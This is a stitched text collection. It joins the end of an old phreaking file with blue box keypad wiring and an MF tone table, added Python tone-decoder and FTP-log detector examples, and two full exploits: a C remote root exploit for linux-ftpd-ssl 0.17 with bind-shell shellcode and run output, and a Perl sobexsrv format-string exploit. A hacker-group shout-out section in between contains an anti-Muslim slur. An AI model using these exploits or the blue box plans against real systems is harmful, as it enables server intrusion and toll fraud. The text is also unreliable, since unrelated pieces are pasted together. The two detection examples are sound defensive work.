| Multiplex Keypad System |
+-------------------------+

First, the multiplex pattern used in the 4x4 keypad layout. I suggest that keys 0-9 be used as the Blue Box's 0-9 keys, and then you can assign the A-D, *, # keys to your comfort (i.e. * = KP, # = ST, D = 2600, and A-C as KP1, KP2 or however you want).

Note: On your 2600 Hz key (the D key in the example above) it may be a good idea to tune in a second potentiometer to 3700 Hz (Pink Noise).
   Keypad          Key Assignments       Multiplex Pattern
+---------+       +-------------+       +------------+
| 1 2 3 A |       |  1  2  3  4 |       | 1 2 3 A    |----Y1=8    X1=3
| 4 5 6 B |       |  5  6  7  8 |       | 4 5 6 B    |----Y2=1    X2=5
| 7 8 9 C |       |  9 10 11 12 |       | 7 8 9 C    |----Y3=2    X3=6
| * 0 # D |       | 13 14 15 16 |       | * 0 # D    |----Y4=4    X4=7
+---------+       +-------------+       +------------+
                                          |  |  |  |
                                         X1 X2 X3 X4

+----------------------+
| Blue Box Frequencies |
+----------------------+

This section is taken directly from Mark Tabas's "Better Homes and Blue Boxing" file, Part 1.

Frequencies (Hz)     Domestic    Int'l
----------------------------------------
700+900                 1          1
700+1100                2          2
900+1100                3          3
700+1300                4          4
900+1300                5          5
1100+1300               6          6
700+1500                7          7
900+1500                8          8
1100+1500               9          9
1300+1500               0          0
700+1700               ST3p       Code 11
900+1700               STp        Code 12
1100+1700              KP         KP1
1300+1700              ST2p       KP2
1500+1700              ST         ST
2600+3700              *Trunking Frequency*

Note: For any further information about the uses or duration of the frequencies, read the Mark Tabas files.

+----------------+
| Schematic Help |
+----------------+

This is the key to the diagrams in the schematic. I hope that they help more than they might hurt.

  _|_
  X_/GND       is the Ground symbol

    | |
 ---| |--      is the Capacitor symbol
    | |
    (.1C)  stands for a .1 uf Capacitor
    (.01C) stands for a .01 uf Capacitor

    |
  -----
  -----        is another Capacitor symbol
    |

 --X/XRx/X/--  is the Resistor symbol
               (The 1.5K Ohm and 1.0K Ohm Resistors are at +/- 5%)

    ---+
       |
  X/X/X/X/--   is the Potentiometer symbol
               (The frequencies I supplied above are just examples.)

 --|>o--       is the Inverter symbol

+------------+
| Conclusion |
+------------+

This is just one way to build a Blue Box. If you choose this way, then I hope this file is adequate enough to aid you in the construction. Although these are not the best plans, they do work. This file does not tell you how to use it or what to do once it's built. For that information I suggest that you read Mark Tabas's "Better Homes and Blue Boxing" files, or any other files/BBS subboards that deal with that realm.
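The frequency table above is also what the receiving side has to recognise, and the same detection is how a carrier spots MF or 2600 Hz signalling arriving on a subscriber line where it never legitimately occurs. As an added example, not part of Jester Sluggo's plans or the Mark Tabas files, here is a Python decoder that uses the Goertzel algorithm to classify a sample buffer as one of the domestic MF codes from the table, as the 2600 Hz trunking tone, or as nothing valid. The 8000 samples/s rate, the 100 ms window (which makes each table frequency land on an exact 10 Hz bin), the power ratios, and the synth() test input are all constructed choices for the example.

```python
import math

FS = 8000   # sample rate, Hz (constructed)
N = 800     # 100 ms window: every MF frequency is an exact multiple of 10 Hz

MF_FREQS = (700, 900, 1100, 1300, 1500, 1700)
TRUNK_FREQ = 2600

# Domestic column of the frequency table quoted on the page (Mark Tabas, BHBB part 1).
MF_TABLE = {
    (700, 900): "1",   (700, 1100): "2",  (900, 1100): "3",  (700, 1300): "4",
    (900, 1300): "5",  (1100, 1300): "6", (700, 1500): "7",  (900, 1500): "8",
    (1100, 1500): "9", (1300, 1500): "0", (700, 1700): "ST3p",
    (900, 1700): "STp", (1100, 1700): "KP", (1300, 1700): "ST2p",
    (1500, 1700): "ST",
}


def goertzel_power(samples, freq, fs=FS):
    """Energy of `samples` at `freq` (second-order Goertzel recurrence, one DFT bin)."""
    n = len(samples)
    k = round(n * freq / fs)
    w = 2.0 * math.pi * k / n
    coeff = 2.0 * math.cos(w)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s2 * s2 + s1 * s1 - coeff * s1 * s2


def decode_mf(samples, min_power=1.0):
    """Return the MF code, "2600" for the trunking tone, or None when no valid signal is present.

    A valid MF digit is exactly two of the six frequencies at comparable power
    with the rest quiet; a single tone or a three-tone mess is rejected.
    """
    powers = {f: goertzel_power(samples, f) for f in MF_FREQS + (TRUNK_FREQ,)}
    ranked = sorted(powers.items(), key=lambda kv: kv[1], reverse=True)
    (f1, p1), (f2, p2), (_, p3) = ranked[:3]
    if p1 < min_power:                       # silence / noise floor
        return None
    if f1 == TRUNK_FREQ and p2 < 0.1 * p1:   # lone 2600 Hz: trunk seizure tone
        return "2600"
    if p2 < 0.3 * p1 or p3 > 0.1 * p1:       # not a clean two-tone pair
        return None
    return MF_TABLE.get(tuple(sorted((f1, f2))))


def synth(freqs, amp=0.5, n=N, fs=FS):
    """Constructed test input: a sum of pure sine tones, one window long."""
    return [sum(amp * math.sin(2.0 * math.pi * f * i / fs) for f in freqs)
            for i in range(n)]


if __name__ == "__main__":
    for label, tones in (("digit 5", (900, 1300)), ("KP", (1100, 1700)),
                         ("trunk", (2600,)), ("lone 700", (700,))):
        print(label, "->", decode_mf(synth(tones)))
```

The 7-10% tolerance the plans mention is wider than this decoder's 10 Hz bins, so a real detector would sum two or three neighbouring bins per frequency (or use a shorter window) before ranking; the page's own advice to tune with an oscilloscope is the same point seen from the transmitting side.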
If you need help, I sluggest (thanks for that one Taran) that you ask a close friend, possibly an electronics teacher, or a phreak friend to help you. Also, if you need help or have questions or comments about this file, you can address them to me. I can be contacted through the LOD/H Technical Journal Staff account on the boards listed in the Intro, or on the few boards I call.

+-------------+
! Credentials !
+-------------+

At last, this article would not be possible without the help of the following people/places who contributed to it in one way or another (it may not be apparent to them, but every minute bit helps).

Deserted Surfer    (Who helped immensely from Day 1 of this project.)
                   (Without his help this file would not be.)
Mark Tabas         (For the BHBB files which inspired my interests.)
Nickie Halflinger  (For the original Blue Box plans I used.)
Mr. America        (For the original Blue Box plans I used.)
Lex Luthor
Cheap Shades
Exar Corp.

Lastly, I would like to thank the United States government for furnishing federal grants to this project. Without their financial help, I would have had to dish out the money from my own pocket (Approximately $80.00. Egads!)

************************************************************************************
linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit -by dumb0

/* connecting to 192.168.2.9:21... ok.
OK - STARTING ATTACK +++ USING STACK ADDRESS 0xbfffcc03 +++ +++ USING STACK ADDRESS 0xbfffcc13 +++ +++ USING STACK ADDRESS 0xbfffcc23 +++ +++ USING STACK ADDRESS 0xbfffcc33 +++ +++ USING STACK ADDRESS 0xbfffcc43 +++ +++ USING STACK ADDRESS 0xbfffcc53 +++ +++ USING STACK ADDRESS 0xbfffcc63 +++ +++ USING STACK ADDRESS 0xbfffcc73 +++ +++ USING STACK ADDRESS 0xbfffcc83 +++ +++ USING STACK ADDRESS 0xbfffcc93 +++ +++ USING STACK ADDRESS 0xbfffcca3 +++ +++ USING STACK ADDRESS 0xbfffccb3 +++ +++ USING STACK ADDRESS 0xbfffccc3 +++ +++ USING STACK ADDRESS 0xbfffccd3 +++ +++ USING STACK ADDRESS 0xbfffcce3 +++ +++ USING STACK ADDRESS 0xbfffccf3 +++ +++ USING STACK ADDRESS 0xbfffcd03 +++ +++ USING STACK ADDRESS 0xbfffcd13 +++ +++ USING STACK ADDRESS 0xbfffcd23 +++ +++ USING STACK ADDRESS 0xbfffcd33 +++ +++ USING STACK ADDRESS 0xbfffcd43 +++ +++ USING STACK ADDRESS 0xbfffcd53 +++ +++ USING STACK ADDRESS 0xbfffcd63 +++ +++ USING STACK ADDRESS 0xbfffcd73 +++ +++ USING STACK ADDRESS 0xbfffcd83 +++ +++ USING STACK ADDRESS 0xbfffcd93 +++ +++ USING STACK ADDRESS 0xbfffcda3 +++ +++ USING STACK ADDRESS 0xbfffcdb3 +++ +++ USING STACK ADDRESS 0xbfffcdc3 +++ +++ USING STACK ADDRESS 0xbfffcdd3 +++ +++ USING STACK ADDRESS 0xbfffcde3 +++ +++ USING STACK ADDRESS 0xbfffcdf3 +++ +++ USING STACK ADDRESS 0xbfffce03 +++ +++ USING STACK ADDRESS 0xbfffce13 +++ +++ USING STACK ADDRESS 0xbfffce23 +++ +++ USING STACK ADDRESS 0xbfffce33 +++ +++ USING STACK ADDRESS 0xbfffce43 +++ +++ USING STACK ADDRESS 0xbfffce53 +++ +++ USING STACK ADDRESS 0xbfffce63 +++ +++ USING STACK ADDRESS 0xbfffce73 +++ +++ USING STACK ADDRESS 0xbfffce83 +++ +++ USING STACK ADDRESS 0xbfffce93 +++ +++ USING STACK ADDRESS 0xbfffcea3 +++ +++ USING STACK ADDRESS 0xbfffceb3 +++ +++ USING STACK ADDRESS 0xbfffcec3 +++ id uid=0(root) gid=0(root) egid=1000(dumb0) groups=1000(dumb0),20(dialout),24(cdrom ),25(floppy),29(audio),44(video),46(plugdev) uname -a Linux debian 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux // Tested on 
Linux 2.4.18-14 Redhat 8.0 // Linux 2.2.20-idepci Debian GNU 3.0 // Linux 2.4.27-2-386 Debian GNU 3.1 */ #include #include #include #include #include #include #include #include #include #include #include #define BUF_SIZ 4096 #define PORT 21 #define BINDPORT 30464 #define STACK_START 0xbfffcc03 #define STACK_END 0xbffff4f0 /*my shellcode*/ /*setreuid,chroot break, bind to port 30464, 0xff is double*/ unsigned char lnx_bind[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\xEB\x70\x31\xC0\x31\xDB\x31\xC9" "\xB0\x46\xCD\x80\x5E\x90\xB8\xBE" "\xff\xff\xff\xff\xff\xff\xF7\xD0" "\x89\x06\xB0\x27\x8D\x1E\xFE\xC5" "\xB1\xED\xCD\x80\x31\xC0\x8D\x1E" "\xB0\x3D\xCD\x80\x66\xB9\xff\xff" "\x03\xBB\xD2\xD1\xD0\xff\xff\xF7" "\xDB\x89\x1E\x8D\x1E\xB0\x0C\xCD" "\x80\xE2\xEF\xB8\xD1\xff\xff\xff" "\xff\xff\xff\xF7\xD0\x89\x06\xB0" "\x3D\x8D\x1E\xCD\x80\x31\xC0\x31" "\xDB\x89\xF1\xB0\x02\x89\x06\xB0" "\x01\x89\x46\x04\xB0\x06\x89\x46" "\x08\xB0\x66\x43\xCD\x80\x89\xF1" "\x89\x06\xB0\x02\x66\x89\x46\x0C" "\xEB\x04\xEB\x74\xEB\x77\xB0\x77" "\x66\x89\x46\x0E\x8D\x46\x0C\x89" "\x46\x04\x31\xC0\x89\x46\x10\xB0" "\x10\x89\x46\x08\xB0\x66\x43\xCD" "\x80\xB0\x01\x89\x46\x04\xB0\x66" "\xB3\x04\xCD\x80\x31\xC0\x89\x46" "\x04\x89\x46\x08\xB0\x66\xB3\x05" "\xCD\x80\x88\xC3\xB0\x3F\x31\xC9" "\xCD\x80\xB0\x3F\xB1\x01\xCD\x80" "\xB0\x3F\xB1\x02\xCD\x80\xB8\xD0" "\x9D\x96\x91\xF7\xD0\x89\x06\xB8" "\xD0\x8C\x97\xD0\xF7\xD0\x89\x46" "\x04\x31\xC0\x88\x46\x07\x89\x76" "\x08\x89\x46\x0C\xB0\x0B\x89\xF3" "\x8D\x4E\x08\x8D\x56\x0C\xCD\x80" "\xE8\x15\xff\xff\xff\xff\xff\xff"; long ficken() { printf("lnxFTPDssl_warez.c\nlinux-ftpd-ssl 0.17 remote r00t exploit by dumb0\n\n"); return 0xc0debabe; } void usage(char **argv) { printf("Insufficient parameters given.\n"); printf("Usage: %s [writeable directory]\n", argv[0]); exit(0); } void _recv(int sock, char *buf) { int bytes=recv(sock, buf, BUFSIZ, 0); if (bytes < 0) { perror("read() failed"); exit(1); } } void attack(int sock, unsigned long ret, char *pad) { int i,k; 
char *x=(char*)malloc(1024); char *bufm=(char*)malloc(1024); char *bufc=(char*)malloc(1024); char *rbuf=(char*)malloc(BUFSIZ+10); char *nops=(char*)malloc(1024); unsigned char a,b,c,d; memset(nops,0,1024); memset(nops,0x90,255); memset(x,0,1024); for (i=0,k=0;i<60;i++) { a=(ret >> 24) & 0xff; b=(ret >> 16) & 0xff; c=(ret >> 8) & 0xff; d=(ret) & 0xff; if (d==255) { x[k]=d; x[++k]=255; } else { x[k]=d; } if (c==255) { x[k+1]=c; x[++k+1]=255; } else { x[k+1]=c; } if (b==255) { x[k+2]=b; x[++k+2]=255; } else { x[k+2]=b; } if (a==255) { x[k+3]=a; x[++k+3]=255; } else { x[k+3]=a; } k+=4; } snprintf(bufm, 1000, "MKD %s%s\r\n", pad, x); // 1x'A' redhat 8.0 / 2x'A' debian gnu 3.0 / 3x'A' debian gnu 3.1 snprintf(bufc, 1000, "CWD %s%s\r\n", pad, x); for (i=0; i<11; i++) { send(sock, bufm, strlen(bufm), 0); recv(sock, rbuf, BUFSIZ, 0); send(sock, bufc, strlen(bufc), 0); recv(sock, rbuf, BUFSIZ, 0); } for (i=0; i<2; i++) { snprintf(bufm, 1000, "MKD %s\r\n", lnx_bind); snprintf(bufc, 1000, "CWD %s\r\n", lnx_bind); send(sock, bufm, strlen(bufm), 0); recv(sock, rbuf, BUFSIZ, 0); send(sock, bufc, strlen(bufc), 0); recv(sock, rbuf, BUFSIZ, 0); snprintf(bufm, 1000, "MKD %s\r\n", nops); snprintf(bufc, 1000, "CWD %s\r\n", nops); send(sock, bufm, strlen(bufm), 0); recv(sock, rbuf, BUFSIZ, 0); send(sock, bufc, strlen(bufc), 0); recv(sock, rbuf, BUFSIZ, 0); } send(sock, "XPWD\r\n", strlen("XPWD\r\n"), 0); free(bufm); free(bufc); free(x); free(rbuf); } int do_remote_shell(int sockfd) { while(1) { fd_set fds; FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sockfd,&fds); if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)) { int cnt; char buf[1024]; if(FD_ISSET(0,&fds)) { if((cnt=read(0,buf,1024))<1) { if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(sockfd,buf,cnt); } if(FD_ISSET(sockfd,&fds)) { if((cnt=read(sockfd,buf,1024))<1) { if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(1,buf,cnt); } } } } int do_connect (char *remotehost, int port) { struct hostent *host; struct 
sockaddr_in addr; int s; if (!inet_aton(remotehost, &addr.sin_addr)) { host = gethostbyname(remotehost); if (!host) { perror("gethostbyname() failed"); return -1; } addr.sin_addr = *(struct in_addr*)host->h_addr; } s = socket(PF_INET, SOCK_STREAM, 0); if (s == -1) { perror("socket() failed"); return -1; } addr.sin_port = htons(port); addr.sin_family = AF_INET; if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1) { if (port == PORT) perror("connect() failed"); return -1; } return s; } void do_login(int s, char *buf, char *sendbuf, char *user, char *pass) { memset(buf, 0, sizeof(buf)); memset(sendbuf, 0, sizeof(sendbuf)); do { _recv(s, buf); } while (strstr(buf, "220 ") == NULL); snprintf(sendbuf, BUFSIZ, "USER %s\r\n", user); send(s, sendbuf, strlen(sendbuf), 0); do { _recv(s, buf); } while (strstr(buf, "331 ") == NULL); snprintf(sendbuf, BUFSIZ, "PASS %s\r\n", pass); send(s, sendbuf, strlen(sendbuf), 0); do { _recv(s, buf); } while (strstr(buf, "230 ") == NULL); } int main(int argc, char **argv) { char remotehost[255]; char user[255]; char pass[255]; char pad[10]; char *buf,*sendbuf; int stackaddr=STACK_START; int s,sr00t,i; ficken(); if (argc < 4) usage(argv); strncpy(remotehost, argv[1], sizeof(remotehost)); remotehost[sizeof(remotehost)-1]=0; strncpy(user, argv[2], sizeof(user)); user[sizeof(user)-1]=0; strncpy(pass, argv[3], sizeof(pass)); pass[sizeof(pass)-1]=0; printf("connecting to %s:%d...", remotehost, PORT); fflush(stdout); s=do_connect(remotehost, PORT); puts(" ok."); buf=(char*)malloc(BUFSIZ+10); sendbuf=(char*)malloc(BUFSIZ+10); do_login(s, buf, sendbuf, user, pass); if (strstr(buf, "230")!=NULL) { printf("OK - STARTING ATTACK\n"); i=0; while (stackaddr <= STACK_END) { printf("+++ USING STACK ADDRESS 0x%.08x +++\n", stackaddr); sleep(1); if (i==1) { strcpy(pad, "A"); } if (i==2) { strcpy(pad, "AA"); } if (i==3) { strcpy(pad, "AAA"); i=0; } attack(s, stackaddr, pad); close(s); s=do_connect(remotehost, PORT); do_login(s, buf, sendbuf, user, 
pass); if (argv[4] != NULL) { snprintf(sendbuf, BUFSIZ, "CWD %s\r\n", argv[4]); send(s, sendbuf, strlen(sendbuf), 0); recv(s, buf, BUFSIZ, 0); } if((sr00t=do_connect(remotehost, BINDPORT)) > 0) { /* XXX Remote r00t */ printf("\nLet's get ready to rumble!\n"); do_remote_shell(sr00t); exit(0); } stackaddr+=16; i++; } } else { printf("\nLogin incorrect\n"); exit(1); } free(buf); free(sendbuf); return 0; } ********************************************************************************************** #!/usr/bin/perl # # trifinite.group Bluetooth sobexsrv remote syslog() exploit # code by kf_lists[at]digitalmunition[dot]com # # http://www.cdej.org $retloc = 0x8053418; # Due to unicode the filename is NOT usable. Must use file contents. # R_386_JUMP_SLOT exit() $addy = "\x5a\x19\x05\x08"; $addy2 = "\x58\x19\x05\x08"; $lo = ($retloc >> 0) & 0xffff; $hi = ($retloc >> 16) & 0xffff; $hi = $hi - 0x38; $lo = (0x10000 + $lo) - $hi - 0x38; #print "hi: $hi\n"; #print "lo: $lo\n"; $string = "./ussp-push 00:0B:0D:63:0B:CC\@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\\\$hn%$lo.d%28\\\$hn" . "\x41" x 200; #print $string . "\n"; $sc = "\x90" x 31 . # Metasploit /usr/bin/id shellcode "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4c\x46\x4b\x50\x4a\x35". "\x49\x39\x44\x55\x48\x46\x4a\x46\x4d\x52\x43\x36\x49\x58\x47\x4e". "\x4a\x56\x4f\x52\x43\x57\x4a\x46\x42\x50\x4a\x56\x4f\x32\x44\x56". "\x49\x46\x50\x56\x49\x58\x43\x4e\x44\x45\x4a\x4e\x4e\x30\x42\x30". "\x42\x30\x42\x50\x4f\x32\x45\x47\x43\x57\x44\x47\x4f\x32\x44\x56". "\x49\x36\x50\x46\x4f\x52\x49\x56\x46\x36\x42\x50\x47\x45\x43\x35". 
"\x49\x58\x41\x4e\x4d\x4c\x42\x38\x5a";

open(F, "> /tmp/shellcode") or die "can't open file";
print F "$sc\n";
close(F);
system($string);
*******************************************************************************************************

On behalf of the elite CDEJ staff I'd like to thank the following figures for making this possible:

Longarm: our beloved monkey chief <:D>

trans: 5 stars general trans :D? highest member in ranking so far :D? you've outdone yourself again little brother, :.)

hunt3rx: mysterious spy/fed :? brought us l0lz n ports when the CDEJ staff was out on field trips in m*slim (spit) territories, and our usual gay day jobs. Thank you hunt3rx

_Padre_: renowned .gov defacer with pure moral intentions: lebx0r is gay ditch it!

migzy: channel operator who actively brought undernet infestors onto efnet. thank you for ruining what is left of a decent IRC >:D<

*******************************************************************************************************
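The linux-ftpd-ssl exploit above leaves an unmistakable trace on the server: eleven MKD/CWD pairs per attempt whose arguments are hundreds of bytes of return address, then an argument that is nothing but shellcode and a 0x90 sled, then a disconnect and the same again at the next stack address. None of that looks like a directory name. As an added example, not from the exploit's author or the linux-ftpd project, here is a Python checker over a constructed FTP command log (one line per command: timestamp, client address, command, argument); the 192.0.2.x addresses, the 255-byte argument threshold and the two-hit client threshold are assumptions made up for the example.

```python
import string

MAX_ARG_LEN = 255                       # constructed threshold for MKD/CWD arguments
PATH_CMDS = {b"MKD", b"CWD", b"XMKD", b"XCWD"}
# Bytes a real path argument may contain; CR/LF can never appear inside one.
PRINTABLE = set(string.printable.encode()) - {10, 13}

# Constructed sample log, not from the page: "<timestamp> <client> <command> [argument]".
SAMPLE_LOG = [
    b"2005-12-15T10:00:01 192.0.2.10 USER dumb0",
    b"2005-12-15T10:00:02 192.0.2.10 CWD /pub",
    b"2005-12-15T10:00:03 192.0.2.10 MKD " + b"A" * 300,
    b"2005-12-15T10:00:04 192.0.2.10 CWD " + b"\x90" * 40 + b"\x31\xc0\xcd\x80",
    b"2005-12-15T10:00:05 192.0.2.20 CWD /incoming",
]


def parse_line(line):
    """Split one log line into (timestamp, client, COMMAND, argument); None if malformed."""
    parts = line.split(b" ", 3)
    if len(parts) < 3:
        return None
    ts, client, cmd = parts[:3]
    arg = parts[3] if len(parts) == 4 else b""
    return ts, client, cmd.upper(), arg


def check_command(cmd, arg):
    """Reasons this path command is suspicious; empty list for anything plausible."""
    reasons = []
    if cmd not in PATH_CMDS:
        return reasons
    if len(arg) > MAX_ARG_LEN:
        reasons.append("oversized path argument (%d bytes)" % len(arg))
    if any(b not in PRINTABLE for b in arg):
        reasons.append("non-printable bytes in path argument")
    if b"\x90" * 8 in arg:
        reasons.append("run of 0x90 bytes (NOP sled signature)")
    return reasons


def scan(lines):
    """Return one finding dict per suspicious command, in log order."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, cmd, arg = rec
        reasons = check_command(cmd, arg)
        if reasons:
            findings.append({"ts": ts.decode(), "client": client.decode(),
                             "cmd": cmd.decode(), "reasons": reasons})
    return findings


def suspicious_clients(lines, threshold=2):
    """Clients with at least `threshold` suspicious path commands: the brute-force loop shows up here."""
    counts = {}
    for f in scan(lines):
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return sorted(c for c, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["client"], f["cmd"], "; ".join(f["reasons"]))
    print("repeat offenders:", suspicious_clients(SAMPLE_LOG))
```

The length check alone catches the address-spray stage, the non-printable check catches the payload stage regardless of which shellcode is used, and the per-client count is what turns one odd command into an alert when the loop restarts after every disconnect. A server that bounded its own path buffers would not need any of this, which is the actual fix.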